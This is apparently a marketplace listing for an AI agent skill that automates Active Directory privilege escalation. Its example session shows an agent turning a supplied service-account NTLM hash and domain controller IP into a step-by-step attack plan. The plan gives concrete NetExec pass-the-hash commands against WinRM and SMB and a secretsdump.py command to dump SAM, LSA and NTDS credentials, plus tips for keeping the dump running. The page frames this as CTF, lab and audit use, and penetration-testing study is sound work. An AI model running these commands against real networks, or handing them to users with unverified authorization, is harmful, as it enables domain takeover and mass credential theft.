Works with the AI tools you already use
ad ntds escalation
Systematic Active Directory escalation ladder from initial foothold to NTDS.dit extraction using NTLM hash reuse.
Free
ad ntds escalation
Example session with this skill installed
I have a low-priv user hash (svc_backup:e9ed21f644e282b3d395759796029857) and the DC IP is 10.10.10.100. Provide an escalation plan to dump NTDS.
- Read your context and instructions
- Compiled the ad ntds escalation
I have mapped the escalation path from the svc_backup service account to a full NTDS dump. I will prioritize clock synchronization first to ensure Kerberos and NTLM operations do not fail due to time skew.
AD Escalation Plan: 10.10.10.100
| Step | Action | Command/Tool | Objective |
|---|---|---|---|
| 1 | Triage | nmap -Pn -p445 --script smb2-time 10.10.10.100 | Sync local clock with DC to prevent auth drift |
| 2 | Host Mapping | echo "10.10.10.100 corp.local" >> /etc/hosts | Ensure Kerberos FQDN resolution |
| 3 | Foothold Test | nxc winrm 10.10.10.100 -u svc_backup -H e9ed21f6... -d corp.local | Check for direct WinRM shell (Pwn3d!) |
| 4 | Lateral Move | nxc smb 10.10.10.100 -u svc_backup -H e9ed21f6... --groups | Enumerate BackupAccess or Remote Mgmt groups |
| 5 | DC Extraction | secretsdump.py 'corp.local/svc_backup@10.10.10.100' -hashes :e9ed21f6... | Dump SAM/LSA/NTDS (Run in background) |
Next steps
- Run the
nmaptime check and adjust your local system time immediately. - Execute the NetExec WinRM check; if it returns
Pwn3d!, we have a shell. - If
svc_backuphas DC admin rights, initiate thesecretsdump.pyprocess usingnohupor a background multiplexer to avoid timeout during the 5-10 minute NTDS extraction.
Connects securely to your tools. The creator never sees your data.
About this skill
The problem
Active Directory engagements often stall due to Kerberos time skew or over-complicating the escalation path. Security professionals waste hours debugging authentication failures when a simple NTLM hash reuse or clock sync would have secured a domain foothold.
What it does
- Performs initial triage including clock synchronization and FQDN mapping to prevent Kerberos auth blockers.
- Systematically tests recovered credentials across SMB, WinRM, MSSQL, and LDAP services using pass-the-hash (PTH).
- Executes an escalation ladder from anonymous LDAP enumeration to service account exploitation and NTDS.dit dumping.
- Automates domain controller secret extraction using
secretsdump.pywith background execution to avoid session timeouts.
Frameworks & tools
NetExec (nxc), Impacket (secretsdump, getTGT), bloodyAD, and LDAP3.
Why this beats prompting it yourself
It enforces a "cheapest-first" methodology that prioritizes hash reuse over noisy exploits. It includes specific tool workarounds, such as forcing NetExec for WinRM hash auth where standard libraries fail, and mandates backgrounding long-running NTDS dumps to prevent data loss.
Use cases
- Escalating from a single workstation foothold to Domain Admin in a CTF or lab environment.
- Auditing Domain Controller security by attempting to dump the SAM, LSA, and NTDS databases.
- Identifying misconfigured service accounts with WinRM access or Reanimate rights.
Known limitations
Requires an existing foothold or credential set to begin the ladder. NTDS dumping requires local administrative privileges on the Domain Controller.
How to install
Works the same in every agent - Claude, Cursor, Codex, Copilot and 20+ more.
- 1
Download the ZIP
Free skills download straight away. Paid skills unlock right after purchase.
- 2
Unzip into your skills folder
Every agent reads skills from one folder on your machine. Drop the unzipped folder in there.
- 3
Ask your agent to use it
Restart the agent if it was already running. It picks the skill up automatically - no config needed.
Skills folder by agent
Click the path to copy it. Create the folder if it does not exist yet.
Reviews
No reviews yet
Be one of the first to try it. Every listed skill passes our trust checks below.
Security scanned
Passed our 8-point scan before listing
Fresh listing
Recently published to Agensi
Free forever
No account required to browse
Trust & safety
Security scanned
Verified clean today
- Free to download with an account